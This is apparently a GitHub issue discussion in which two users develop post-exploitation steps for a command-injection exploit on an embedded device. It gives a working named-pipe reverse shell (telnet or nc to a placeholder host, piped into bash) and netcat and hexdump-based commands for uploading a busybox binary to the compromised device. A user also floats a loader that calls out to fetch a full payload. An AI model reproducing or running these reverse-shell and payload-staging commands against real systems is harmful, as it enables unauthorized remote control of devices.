Reverse shell command

[BigNerd95]

Reverse shell

What about a command like this to implement the reverse shell ?

/bin/mknod /ram/f p; /bin/telnet x.x.x.x 1337 < /ram/f | /bin/bash > /ram/f 2>&1

Maybe replacing telnet with nc as used here https://github.com/BigNerd95/Chimay-Red#reverse-shell

Upload files

Then to upload a more complete busybox you can use a command like this (in combination with reverse shell)

wget https://busybox.net/downloads/binaries/1.28.1-defconfig-multiarch/busybox-mips
hexdump -v -e '"echo -e -n " 1024/1 "\\\\x%02X" " >> /ram/busybox\n"' busybox-mips | sed -e "s/\\\\\\\\x  //g" | nc -l -q 0 -p 1337

as used here https://github.com/BigNerd95/Chimay-Red#upload-binaries This will split the busybox in chunk of 1024 bytes and will write them as octal number with echo command Example: Or i think you can also upload files using nc directly On PC:

nc -l -q 0 -p 1337 < busybox-mips

On device:

nc x.x.x.x 1337 > /ram/busybox-mips

(I don't have a cisco so i cannot try sorry)

[0x27]

I had some issues using netcat (from the command injection) to stage binaries (it was writing the first 1kb and then exiting), and it seemed to me that using echo over the command-injection would take too long (in other exploits where I do this it takes ~5 mins to stage the "tsh" payload I usually used). Maybe having the echo loader stage a small binary that calls out and downloads a full payload...

Will revisit it though, would be nice to have a fully working reverse shell instead of spawning telnetd :)